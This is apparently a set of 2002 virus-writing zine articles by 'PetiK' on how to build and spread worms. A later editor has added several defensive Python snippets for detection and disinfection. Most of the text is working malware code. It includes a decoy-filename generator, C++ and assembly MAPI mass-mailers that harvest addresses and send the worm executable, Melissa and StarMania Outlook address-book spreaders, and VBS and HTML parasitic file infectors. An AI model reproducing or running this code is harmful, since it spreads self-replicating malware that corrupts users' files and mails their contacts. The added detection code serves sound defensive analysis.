2 <VBS.Ketip.A@mm>
3 <PetiK@aol.com>
4 <kavdaemon@relay.avp.ru>
5 <kavdaemon@relay.avp.ru>kavdaemon@relay.avp.ru</A></TD></TR>
<TR class=aolmailheader>
<TD noWrap vAlign=top width=>
6 <Pentasm99@aol.com>
7 <Pentasm99@aol.com screenname=>
...
...
************************************************************************************************

We can see of course some problems:

- <VBS.Ketip.A@mm> : not a real e-mail address but a Norton worm name
- <kavdaemon@relay.avp.ru>kavdaemon@relay.avp.ru</A></TD></TR>
  <TR class=aolmailheader>
  <TD noWrap vAlign=top width=> : the scan doesn't find the '"' character immediately.
- <Pentasm99@aol.com screenname=> : same problem; the end of the address was not '"' but a space (20h).

##########################
# RANDOM NAME GENERATOR: #
##########################
As I said in my last article about "Hide a copy of a worm", we are going to do the same thing in VBS.
1) tmpname="" ' Value of tmpname is NULL
2) randomize(timer) ' Random size of the first part of name
namel=int(rnd(1)*20)+1 ' between 1 and 20.
3) For lettre = 1 To namel ' Put the letter.
randomize(timer) ' 97 : Start from "a" (65 : Start from "A")
tmpname=tmpname & chr(int(rnd(1)*26)+97) ' 26 : from "a-A" to "z-Z"
Next ' for number 26 => 9 and 97 => 48
4) typext = "execombatbmpjpggifdocxlsppthtmhtthta" ' Now we choose an extension among 12 different ones.
randomize(timer)
tmpext = int(rnd(1)*11)+1
5) tmpname=tmpname & "." & mid(typext,((tmpext-1)*3)+1,3) & ".vbs" ' And we have the result

Code Source:
************************************************************************************************
tmpname=""
randomize(timer)
namel=int(rnd(1)*20)+1
For lettre = 1 To namel
randomize(timer)
tmpname=tmpname & chr(int(rnd(1)*26)+97)
Next
typext = "execombatbmpjpggifdocxlsppthtmhtthta"
randomize(timer)
tmpext = int(rnd(1)*11)+1
tmpname=tmpname & "." & mid(typext,((tmpext-1)*3)+1,3) & ".vbs"
MsgBox tmpname
************************************************************************************************
Some Examples:
mhrmhoulleyl.htm.vbs
rlvqmtyppjcbho.bat.vbs
PREYXUDBNYKNLRSALL.DOC.VBS
869768177527247364.gif.vbs
...
...
This technique is great for changing the name of the worm's copy at each start (look at my last article).
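
From the defender's side, the generator above leaves a recognisable shape: a run of letters or digits, one of the twelve three-letter decoy extensions from the typext table, then ".vbs". The following Python, added here as an example and not part of the original article, flags filenames of that shape in a directory listing; the sample listing is constructed from the example names printed above plus ordinary files.

```python
import re

# Decoy extension table, sliced from the same packed "typext" string the
# generator uses: 12 three-letter extensions laid end to end.
TYPEXT = "execombatbmpjpggifdocxlsppthtmhtthta"
DECOY_EXTENSIONS = tuple(TYPEXT[i:i + 3] for i in range(0, len(TYPEXT), 3))

# Generated names: 1..20 characters from a single class (a-z, A-Z or 0-9,
# depending on the offset the generator adds to rnd), then ".<decoy>.vbs".
# Matching is case-insensitive because the examples include upper-case names.
_GENERATED_NAME = re.compile(
    r"^(?:[a-z]{1,20}|[0-9]{1,20})\.(?:" + "|".join(DECOY_EXTENSIONS) + r")\.vbs$",
    re.IGNORECASE,
)


def is_generated_dropper_name(filename: str) -> bool:
    """True when the filename has the shape the generator above produces."""
    return _GENERATED_NAME.match(filename) is not None


def flag_listing(listing):
    """Return the entries of a directory listing that match that shape."""
    return [name for name in listing if is_generated_dropper_name(name)]


# Constructed sample listing (not from the page): the four example names the
# article prints, mixed with ordinary files that must not be flagged.
SAMPLE_LISTING = [
    "mhrmhoulleyl.htm.vbs",
    "notes.txt",
    "rlvqmtyppjcbho.bat.vbs",
    "report.doc",
    "PREYXUDBNYKNLRSALL.DOC.VBS",
    "setup.exe",
    "869768177527247364.gif.vbs",
    "helper.vbs",
]

if __name__ == "__main__":
    for name in flag_listing(SAMPLE_LISTING):
        print("suspicious double extension:", name)
```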

###############
# CONCLUSION: #
###############
This is the end of the article. I hope that it helps you in your creations and research.
If you have any suggestions or comments, please mail me to petikvx@aol.com
PetiK (www.petikvx.fr.fm)
=== Three ways of spread ===
=== by PetiK (05/20/2002) ===

#################
# Introduction: #
#################

I present in this article the three main ways that I use to spread my worms.

##############
# Read Mail: #
##############

I use this first way to code a worm in C++. It is a simple syntax. For this we use the
MAPI functions: FindNext, ReadMail, SendMail and FreeBuffer.

First of all "prepare" the APIs :

ULONG (PASCAL FAR *mSendMail)(ULONG, ULONG, MapiMessage*, FLAGS, ULONG);
ULONG (PASCAL FAR *mLogon)(ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPLHANDLE);
ULONG (PASCAL FAR *mLogoff)(LHANDLE, ULONG, FLAGS, ULONG);
ULONG (PASCAL FAR *mFindNext)(LHANDLE, ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPTSTR);
ULONG (PASCAL FAR *mReadMail)(LHANDLE, ULONG, LPTSTR, FLAGS, ULONG, lpMapiMessage FAR *);
ULONG (PASCAL FAR *mFreeBuffer)(LPVOID);

Then "call" the APIs :

hMAPI=LoadLibrary("MAPI32.DLL");
(FARPROC &)mSendMail=GetProcAddress(hMAPI, "MAPISendMail");
(FARPROC &)mLogon=GetProcAddress(hMAPI, "MAPILogon");
(FARPROC &)mLogoff=GetProcAddress(hMAPI, "MAPILogoff");
(FARPROC &)mFindNext=GetProcAddress(hMAPI, "MAPIFindNext");
(FARPROC &)mReadMail=GetProcAddress(hMAPI, "MAPIReadMail");
(FARPROC &)mFreeBuffer=GetProcAddress(hMAPI, "MAPIFreeBuffer");

And at the end, the syntax to read the mail, take the e-mail address and send the mail:

// Initialize MAPI
mLogon(NULL,NULL,NULL,MAPI_NEW_SESSION,NULL,&session);

// Find the first mail


if(mFindNext(session,0,NULL,NULL,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS) {
do {

// Read the mail


if(mReadMail(session,NULL,messId,MAPI_ENVELOPE_ONLY|MAPI_PEEK,NULL,&mes)==SUCCESS_SUCCESS)
{

// Here we take the "name" and the "email" of the guy who send the mail
strcpy(mname,mes->lpOriginator->lpszName);
strcpy(maddr,mes->lpOriginator->lpszAddress);
mes->ulReserved=0;
mes->lpszSubject="Subject of worm";
mes->lpszNoteText="Body of Worm.";
mes->lpszMessageType=NULL;
mes->lpszDateReceived=NULL;
mes->lpszConversationID=NULL;
mes->flFlags=MAPI_SENT;
mes->lpOriginator->ulReserved=0;
mes->lpOriginator->ulRecipClass=MAPI_ORIG;
mes->lpOriginator->lpszName=mes->lpRecips->lpszName;
mes->lpOriginator->lpszAddress=mes->lpRecips->lpszAddress;
mes->nRecipCount=1;
mes->lpRecips->ulReserved=0;
mes->lpRecips->ulRecipClass=MAPI_TO;

// Here is the new email


mes->lpRecips->lpszName=mname;
mes->lpRecips->lpszAddress=maddr;
mes->nFileCount=1;
mes->lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc));
memset(mes->lpFiles, 0, sizeof(MapiFileDesc));
mes->lpFiles->ulReserved=0;
mes->lpFiles->flFlags=NULL;
mes->lpFiles->nPosition=-1;
mes->lpFiles->lpszPathName="C:\WINDOWS\worm.exe";
mes->lpFiles->lpszFileName="othername.exe";
mes->lpFiles->lpFileType=NULL;
mSendMail(session, NULL, mes, NULL, NULL);
}

// Find the next mail


}while(mFindNext(session,0,NULL,messId,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS);
free(mes->lpFiles);
mFreeBuffer(mes);

// Close MAPI
mLogoff(session,0,0,0);
FreeLibrary(hMAPI);
}

If you can use these functions in VBS (or VB), very good (and mail me).

************************************************************************************************

#####################
# "mailto:" string: #
#####################

I'm going to explain how to use this way in 3 different languages.

{Win32Asm}

I took the code from my worm I-Worm.Gamma

1st: Open the file

call CreateFileA
inc eax
je END_S
dec eax
xchg eax,ebx

2nd: Map the File

push PAGE_READONLY
push 0
push ebx
call CreateFileMappingA
test eax,eax
jz FERME1

3rd:
push FILE_MAP_READ
push ebp
call MapViewOfFile
test eax,eax
jz FERME2
xchg eax,esi

ls_s_m: call @mt


db 'mailto:'
@mt: pop edi
l_s_m: pushad
push 07h
pop ecx
rep cmpsb ; We compare 7 bytes with "mailto:" string
popad
je s_m
inc esi
loop l_s_m

FERME3: push esi


call UnmapViewOfFile
FERME2: push ebp
call CloseHandle
FERME1: push ebx
call CloseHandle
popad
ret

s_m: xor edx,edx


add esi,7
mov edi,offset mail_address ; and we stock the email in the
push edi ; mail_address offset = EDI
n_c: lodsb
cmp al,' '
je s_c
cmp al,'"' ; If character = "
je e_c
cmp al,'''' ; or character = ', it is the end of the mail
je e_c
cmp al,'@' ; control if exists @
jne o_a
inc edx
o_a: stosb
jmp n_c
s_c: inc esi
jmp n_c
e_c: xor al,al
stosb
pop edi
test edx,edx ; no @ ?? no valid email.
je other_file

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

{C++}

In C++, there are three parts.

First : FindFile

hFile=FindFirstFile(ext,&ffile); //
if(hFile!=INVALID_HANDLE_VALUE) { //
while(abc) { //
GetMail(ffile.cFileName,mail); //
if(strlen(mail)>0) { // NO COMMENTS !
sendmail(mail); //
} //
abc=FindNextFile(hFile,&ffile); //
} //
} //

Second : Get the EMail

void GetMail(char *namefile, char *mail)
{

hf=CreateFile(namefile,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,FILE_ATTRIBUTE_ARCHIVE,0);
if(hf==INVALID_HANDLE_VALUE)
return; // Like in Win32Asm :
size=GetFileSize(hf,NULL); // Open File
if(!size)
return; // Empty ?? Close it
size-=100;

hf2=CreateFileMapping(hf,0,PAGE_READONLY,0,0,0);
if(!hf2) {
CloseHandle(hf); // Map the file
return;
}

mapped=(char *)MapViewOfFile(hf2,FILE_MAP_READ,0,0,0);
if(!mapped) {
CloseHandle(hf2);
CloseHandle(hf);
return;
}

i=0;
while(i<size && !test) {
if(!strncmpi("mailto:",mapped+i,strlen("mailto:"))) { // If "mailto:" string exists ??
test=TRUE;
i+=strlen("mailto:");
k=0;
while(mapped[i]!=34 && mapped[i]!=39 && i<size && k<127) { // Until " or ' character
if(mapped[i]!=' ') {
mail[k]=mapped[i];
k++;
if(mapped[i]=='@') // Check @ character
valid=TRUE;
}
i++;
}
mail[k]=0; // and store the email in the mail buffer
} else
i++;
}

if(!valid)
mail[0]=0;
UnmapViewOfFile(mapped);
CloseHandle(hf2);
CloseHandle(hf);
return;
}

Third : Send the mail

void sendmail(char *tos)
{
memset(&mess,0,sizeof(MapiMessage));
memset(&from,0,sizeof(MapiRecipDesc));

from.lpszName=NULL;
from.ulRecipClass=MAPI_ORIG;
mess.lpszSubject="Subject of mail";
mess.lpszNoteText="Body of mail";

mess.lpRecips=(MapiRecipDesc *)malloc(sizeof(MapiRecipDesc));
if(!mess.lpRecips)
return;
memset(mess.lpRecips,0,sizeof(MapiRecipDesc));
mess.lpRecips->lpszName=tos; // Here the mail that we found
mess.lpRecips->lpszAddress=tos;
mess.lpRecips->ulRecipClass=MAPI_TO;
mess.nRecipCount=1;

mess.lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc));
if(!mess.lpFiles)
return;
memset(mess.lpFiles,0,sizeof(MapiFileDesc));
mess.lpFiles->lpszPathName="FullName_of_the_worm.exe";
mess.lpFiles->lpszFileName="othername_of_worm.exe";
mess.nFileCount=1;

mess.lpOriginator=&from;

mSendMail(0,0,&mess,0,0); // Send the mail

free(mess.lpRecips);
free(mess.lpFiles);
}

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

{VBS}

Look at my article "VBS Tutorial"

************************************************************************************************

########################
# Outlook Address Book #
########################

{Win32Asm}
In the virus/worm Win32.HiV, Benny scans the default WAB file to spread.
But it was a little difficult for me. So I coded it differently.

To get the path of the WAB file:

srch_wab:
mov edi,offset wab_path
push offset wab_size ; = fullname of WAB file
push edi
push offset reg
push 0
@pushsz "Software\Microsoft\Wab\WAB4\Wab File Name" ; The name of WAB file
push 80000001h
api SHGetValueA

Open and map the file like for the HTM and HTML files (see above).
Now, scan the file:

d_scan_mail:
call @smtp
db 'SMTP',00h,1Eh,10h,56h,3Ah ; the string we want to find
@smtp:
pop edi
s_scan_mail:
pushad
push 9
pop ecx
rep cmpsb
popad
je scan_mail
inc esi
loop s_scan_mail

....

scan_mail:
xor edx,edx
add esi,21
mov edi,offset mail_addr
push edi ; EDI = EMail
p_c: lodsb
cmp al," "
je car_s
cmp al,00h
je f_mail
cmp al,"@"
jne not_a
inc edx
not_a: stosb
jmp p_c
car_s: inc esi
jmp p_c
f_mail: xor al,al
stosb
pop edi
test edx,edx
je d_scan_mail
call send_mail
jmp d_scan_mail

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

{VBA}
I took the code from W97M.Melissa.A:

Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If UngaDasOutlook = "Outlook" Then
DasMapiName.Logon "profile", "password"
For y = 1 To DasMapiName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y)
x = 1
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x = x + 1
If x > 50 Then oo = AddyBook.AddressEntries.Count
Next oo
BreakUmOffASlice.Subject = "Subject of the worm"
BreakUmOffASlice.Body = "Body of the Worm"
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
Peep = ""
Next y
DasMapiName.Logoff
End If

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

{VBS}
I took the code from VBS.StarMania:

Set O=CreateObject("Outlook.Application")
Set mapi=O.GetNameSpace("MAPI")
For Each AL In mapi.AddressLists
If AL.AddressEntries.Count <> 0 Then
For AddListCount = 1 To AL.AddressEntries.Count
Set ALE = AL.AddressEntries(AddListCount)
Set go = O.CreateItem(0)
go.To = ALE.Address
go.Subject = "GUESS"
go.Body = "GUESS"
go.Attachments.Add(WScript.ScriptFullName)
go.DeleteAfterSubmit = True
go.Send

************************************************************************************************

###############
# Conclusion: #
###############

This is the end of this article.

If you have some questions or suggestions, please mail me to petikvx@aol.com

PetiK (www.petikvx.fr.fm)
=== What language for which work ?? ===
=== by PetiK (06/02/2002) ===

#################
# Introduction: #
#################
Often new coders (newbies) ask themselves what is the best language to code
viruses/worms. So I try to present the different languages that I use to code
my works. First I present the compiled languages (Win32Asm - C/C++ - VB) and
second the script languages.

################
# 1) Win32asm: # THE BEST
################

It's by far the best way to code viruses/worms. You can control everything with it.
This language is useful for a good infection. Today, 98 % of virii are coded
in assembler. There are different ways to spread worms too.
First the MAPI functions. Look at my works (and others) to see the syntax.
Other way: SMTP. It's a good device to deceive the victims. They can believe
that an email comes from a company (support@microsoft.com) or from themselves. But it
is a difficult language in the beginning. See, read and learn tutorials and
other virii/worms' sources.

#############
# 2) C/C++: #
#############

I learnt this language 6 months ago. Advantage: the syntax is as easy as ASM.
It's especially a language to code worms, thanks to <mapi.h>.
You can spread your work by reading old mails or scanning some web files, but also
by coding an SMTP process.
This language is equally used to code worms that use IIS servers to spread, like
the worm W32.Nimda.Worm.
With this language, you can code Linux virii/worms too.

##########
# 3) VB: #
##########

Of course it's a lame language. But you can use Outlook's Address Book to
spread your work without effort. But this sort of program is quickly detected
by AV (Norton: Bloodhound.W32.VBWORM).
Personally, I use this language to code some tools like Virii/Worms Generator
or other things.

###########
# 4) VBS: #
###########

Very easy. I learnt this language by reading the source of VBS.ILoveYou.Worm.
You can easily make a good parasitic virus and a worm with Outlook's Address Book.
Remark: VBS is a Micro$oft language. So you can travel through different
Micro$oft software like Outlook (of course) but also Word.
If you want to read good source coded in VBS, look at Zulu's homepage.

############
# 5) HTML: #
############

With this language, the most interesting works are the virii. Of course you code in
the VBS language (or in JavaScript). It is the same syntax. Try to find a new
sort of spreading.

###########
# 6) VBA: #
###########

If you know the VBS language, you won't have problems coding a macro
virus (DOC / XLS). Coding macro virii is the easiest thing in the VX life. So
you must find novelties (new ways to infect DOC files, infect DOC/XLS files
or spread through DOC/EXE files, etc.). Spreading is easy too: Melissa.A.

###############
# Conclusion: #
###############

This is the end of this article.

If you have some questions or suggestions, please mail me to petikvx@aol.com

PetiK (www.petikvx.fr.fm)
=== VBS/HTML multi-infection ===
=== by PetiK (06/19/2002) ===

#################
# Introduction: #
#################

This article presents how to travel between VBS and HTML files to infect them.
There are 4 chapters : I:   VBS  -> VBS
                       II:  VBS  -> HTML
                       III: HTML -> HTML
                       IV:  HTML -> VBS

#################
# I: VBS -> VBS #
#################
We can frequently see this in VBS viruses. There are two sorts of infection:
-Overwriting : % Too bad, the user sees the problem immediately
               % Crashes the VBS file
So this solution is not very good.
-Parasite : % Start of the file :
            **********************
            * 'mark of the virus *
            *                    *
            *          +         *
            *                    *
            *     VBS virus      *
            **********************
            *                    *
            *   Real VBS prog    *
            *                    *
            **********************
          % End of the file :
            **********************
            * 'mark of the virus *
            **********************
            *                    *
            *   Real VBS prog    *
            *                    *
            **********************
            *                    *
            *     VBS virus      *
            *                    *
            **********************
So we're going to see the code :
'mark
On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
Set ws = CreateObject("WScript.Shell")
Set fl = fso.OpenTextFile(WScript.ScriptFullName, 1)
virus = fl.ReadAll ' Stock the virus code
fl.Close
infectfile()
Sub infectfile()
On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
Set drv = fso.Drives
For Each d In drv ' Get the drive
If d.DriveType = 2 Or d.DriveType = 3 Then
list(d.path&"\")
End If
Next
End Sub
Sub list(doss)
On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
Set fold = fso.GetFolder(doss)
Set yebjp = fold.SubFolders
For Each f1 In yebjp ' Get the folder
infect(f1.Path)
list(f1.Path)
Next
End Sub
Sub infect(doss)
On Error Resume Next
Set zqhanx = CreateObject("Scripting.FileSystemObject")
Set lxxj = zqhanx.GetFolder(doss)
Set fc = lxxj.Files
For Each f1 In fc ' Get the files
ext = fso.GetExtensionName(f1.Path)
ext = lCase(ext)
If (ext = "vbs") Then
Set cot = fso.OpenTextFile(f1.Path, 1, False)
If cot.ReadLine <> "'mark" Then ' check is already infected
cot.Close
Set cot = fso.OpenTextFile(f1.Path, 1, False)
vbsorg = cot.ReadAll()
cot.Close
Set inf = fso.OpenTextFile(f1.Path, 2, True)
inf.WriteLine virus ' write virus code
inf.WriteLine ""
inf.WriteLine (vbsorg) ' write real code
inf.Close
End If
End If
Next
End Sub

###################
# II: VBS -> HTML #
###################
So, the idea is to put the viral code into the HTML file. How? By converting it into a hex string:
....
....
If (ext = "htm") or (ext = "html") Then
Set cot = fso.OpenTextFile(f1.Path, 1, False)
If InStr(1,cot.ReadAll(),"vbshex") = 0 Then ' check is already infected
cot.Close
Set htmf = fso.OpenTextFile(f1.Path, 8, False)
htmf.WriteLine "<SCRIPT LANGUAGE=VBSCRIPT>"
f = "vbshex="""
For i = 1 to Len(virus) ' take all char
e=Mid(virus,i,1)
e=Hex(Asc(e)) ' and convert in hex
If Len(e)=1 Then
e="0"&e 'DA -> 0D0A for VbCrLf
End If
f=f+e
Next

f=f+""""
...... NO FINISH, SEE THE fourth chapter ' Here the infection HTML -> VBS
htmf.WriteLine f
htmf.Close
End If
End If
Set htmf = fso.CreateTextFile("hello.htm",8,-2)
htmf.WriteLine "<SCRIPT LANGUAGE=VBSCRIPT>"

f = "vbshex="""
For i = 1 to Len(virus)
e=Mid(virus,i,1)
e=Hex(Asc(e))
If Len(e)=1 Then
e="0"&e
End If
f=f+e
Next

f=f+""""
htmf.WriteLine f
htmf.Close
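
Both the VBA module in the hex-conversion section earlier (the `e = e + "..."` accumulation that is later decoded by `dec`) and the `vbshex="..."` literal above carry a script as one long hex string. The following Python, an added example that is not part of the original article, pulls such literals out of a document, decodes them the way `dec` does, and reports which script-host constructs the decoded text contains; the HTML and VBA samples are constructed around a harmless script.

```python
import re

# Quoted hex literal assigned to a variable, either directly (vbshex="4F6E...")
# or accumulated VBA-style (e = e + "4F6E..."). The \s* after "+" also tolerates
# the line break that extraction put between "e = e +" and its literal above.
_HEX_ASSIGN = re.compile(r'(\w+)\s*=\s*(?:\1\s*\+\s*)?"([0-9A-Fa-f]{20,})"')

# Constructs whose presence in the decoded text is worth an alert: a script
# that reads its own body, writes files, mails itself or launches things.
SUSPICIOUS_MARKERS = (
    "WScript.ScriptFullName",
    "Scripting.FileSystemObject",
    "Outlook.Application",
    "CreateTextFile",
    "OpenTextFile",
    "Shell ",
    "wscript ",
)


def extract_hex_payloads(text: str) -> dict:
    """Collect hex fragments per variable name, in source order, and join them."""
    payloads = {}
    for var, hexpart in _HEX_ASSIGN.findall(text):
        payloads[var] = payloads.get(var, "") + hexpart
    return payloads


def decode_hex_script(hexstr: str) -> str:
    """Undo the Hex(Asc(c)) encoding: two hex digits per character."""
    if len(hexstr) % 2:
        raise ValueError("odd-length hex string")
    return bytes.fromhex(hexstr).decode("latin-1")


def scan_for_hidden_script(text: str) -> list:
    """Return (variable, decoded_script, markers_found) for each hex payload."""
    findings = []
    for var, hexstr in extract_hex_payloads(text).items():
        try:
            decoded = decode_hex_script(hexstr)
        except ValueError:
            continue
        markers = [m for m in SUSPICIOUS_MARKERS if m in decoded]
        findings.append((var, decoded, markers))
    return findings


# Constructed samples (not from the page): a harmless script hex-encoded the
# same way, once as an HTML "vbshex" literal and once as VBA "e = e + ..."
# fragments, the second of them split across a line break.
SAMPLE_SCRIPT = ('Set fso=CreateObject("Scripting.FileSystemObject")\r\n'
                 'MsgBox fso.GetSpecialFolder(0)\r\n')
SAMPLE_HEX = SAMPLE_SCRIPT.encode("latin-1").hex().upper()
SAMPLE_HTML = ('<SCRIPT LANGUAGE=VBSCRIPT>\n'
               'vbshex="' + SAMPLE_HEX + '"\n'
               '</SCRIPT>')
SAMPLE_VBA = ('e = ""\n'
              'e = e + "' + SAMPLE_HEX[:40] + '"\n'
              'e = e +\n"' + SAMPLE_HEX[40:] + '"\n'
              'read=dec(e)\n')

if __name__ == "__main__":
    for doc in (SAMPLE_HTML, SAMPLE_VBA):
        for var, script, markers in scan_for_hidden_script(doc):
            print(f"{var}: {len(script)} chars decoded, markers={markers}")
```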
#####################
# III: HTML -> HTML #
#####################
It's a simple routine, like in VBS (and it is in VBS).

This is a part of the source:

<mark> ' the mark
<html><head><title>You're title</title></head><body>
<script language=VBScript>
On Error Resume Next
Set fso=CreateObject("Scripting.FileSystemObject")
Set ws=CreateObject("WScript.Shell")
If err.number=429 Then ' err number if user click NO
ws.Run javascript:location.reload()
Else

infhtm(uplobu.GetSpecialFolder(0)) ' call the infhtm function


infhtm(uplobu.GetSpecialFolder(1)) ' in specific folder (better)
infhtm(unlgeu.SpecialFolders("MyDocuments"))
End If
Function infhtm(dir)
If fso.FolderExists(dir) Then
Set ibamih=fso.GetFolder(dir)
Set vtob=ibamih.Files
For each f1 in vtob
ext=lcase(uplobu.GetExtensionName(f1.Name))
If ext="htm" or ext="html" Then ' check extension
Set eqybwx=fso.OpenTextFile(djra.path, 1, False)
If eqybwx.ReadLine <> "<mark>" Then ' already infected ??
eqybwx.Close()
Set eqybwx=fso.OpenTextFile(djra.path, 1, False)
htmorg=eqybwx.ReadAll()
eqybwx.Close()
Set virushtm=document.body.CreateTextRange
Set eqybwx=fso.CreateTextFile(djra.path, True, False)
eqybwx.WriteLine "<mark>" ' put the mark
eqybwx.Write(htmorg) ' put the real code
eqybwx.WriteLine virushtm.htmltext ' put te htm virus
eqybwx.Close()
Else
eqybwx.Close()
End If

End If
Next
End If
End Function
</script></body></html>
Really simple, no?
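
The two infectors in chapters I and III leave a fixed layout behind: the VBS prepender writes the mark plus its own body, an empty line, then the original script; the HTML appender writes a mark line, the original page, then its own HTML. The following Python, added here as an example and not part of the original article, recognises both layouts and restores the original file given the viral block taken from the dropper; note that the VBS infector copies its whole running file, so the prepended block of a second-generation sample also contains the first host, which is why the block must come from the actual dropper. The samples are constructed stand-ins.

```python
# Marks the two infectors above write on the first line of a host file.
VBS_MARK = "'mark"     # prepender: mark+virus, empty line, original script
HTML_MARK = "<mark>"   # appender:  mark line, original page, virus HTML


def first_line(content: str) -> str:
    return content.split("\n", 1)[0].rstrip("\r")


def is_vbs_infected(content: str) -> bool:
    """Same test the infector itself uses: first line equals the mark."""
    return first_line(content) == VBS_MARK


def is_html_infected(content: str) -> bool:
    return first_line(content) == HTML_MARK


def disinfect_vbs(content: str, virus_body: str):
    """Undo  WriteLine virus / WriteLine "" / WriteLine(vbsorg).

    virus_body is the prepended block exactly as taken from the dropper (it
    starts with the mark). Returns the original script, or None when the
    layout does not match."""
    if not is_vbs_infected(content):
        return None
    prefix = virus_body + "\r\n\r\n"        # CRLF from each of the two WriteLines
    if not content.startswith(prefix):
        return None
    original = content[len(prefix):]
    if original.endswith("\r\n"):           # CRLF that WriteLine(vbsorg) appended
        original = original[:-2]
    return original


def disinfect_html(content: str, virus_html: str):
    """Undo  WriteLine "<mark>" / Write(htmorg) / WriteLine virushtm.htmltext."""
    if not is_html_infected(content):
        return None
    prefix = HTML_MARK + "\r\n"
    suffix = virus_html + "\r\n"
    if len(content) < len(prefix) + len(suffix) or not content.endswith(suffix):
        return None
    return content[len(prefix):len(content) - len(suffix)]


# Constructed samples (not from the page): harmless stand-ins for the viral
# blocks, laid out exactly as the two infectors write their hosts.
SAMPLE_VIRUS_VBS = "'mark\r\nOn Error Resume Next\r\nMsgBox \"viral block stand-in\"\r\n"
SAMPLE_ORIG_VBS = 'MsgBox "hello"\r\nWScript.Quit\r\n'
SAMPLE_INFECTED_VBS = SAMPLE_VIRUS_VBS + "\r\n\r\n" + SAMPLE_ORIG_VBS + "\r\n"

SAMPLE_VIRUS_HTML = '<BODY><SCRIPT language=VBScript>MsgBox "stand-in"</SCRIPT></BODY>'
SAMPLE_ORIG_HTML = "<html><body><p>hello</p></body></html>\r\n"
SAMPLE_INFECTED_HTML = HTML_MARK + "\r\n" + SAMPLE_ORIG_HTML + SAMPLE_VIRUS_HTML + "\r\n"

if __name__ == "__main__":
    print(disinfect_vbs(SAMPLE_INFECTED_VBS, SAMPLE_VIRUS_VBS) == SAMPLE_ORIG_VBS)
    print(disinfect_html(SAMPLE_INFECTED_HTML, SAMPLE_VIRUS_HTML) == SAMPLE_ORIG_HTML)
```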

###################
# IV: HTML -> VBS #
###################
So this is the last part.
Look at the second part, where I wrote:

...... NO FINISH, SEE THE fourth chapter ' Here the infection HTML -> VBS
Here we must search for the VBS files, the same way we infect HTM/HTML files.
In the HTML virus we have:
If ext="htm" or ext="html" Then
So we add:
ElseIf ext="vbs" Then
Set cot = fso.OpenTextFile(f1.Path, 1, False)
If cot.ReadLine <> "'mark" Then ' check is already infected
cot.Close
Set cot = fso.OpenTextFile(f1.Path, 1, False)
vbsorg = cot.ReadAll()
cot.Close
----------- here we infect the VBS file -----------
For Y=1 To Len(vbshex) Step 2
virvbs = virvbs & Chr("&H" & Mid(vbshex,Y,2))
Next
Set inf = fso.OpenTextFile(f1.Path, 2, True)
inf.Write virvbs ' write virus code
inf.WriteLine ""
inf.WriteLine (vbsorg) ' write real code
inf.Close
----------- here we infect the VBS file -----------
End If

###################
# V: CONCLUSION : #
###################

This is the end of the article. If you have some suggestions or new ideas, please mail me to
petikvx@aol.fr.
PetiK/[b8] (www.petikvx.fr.fm)
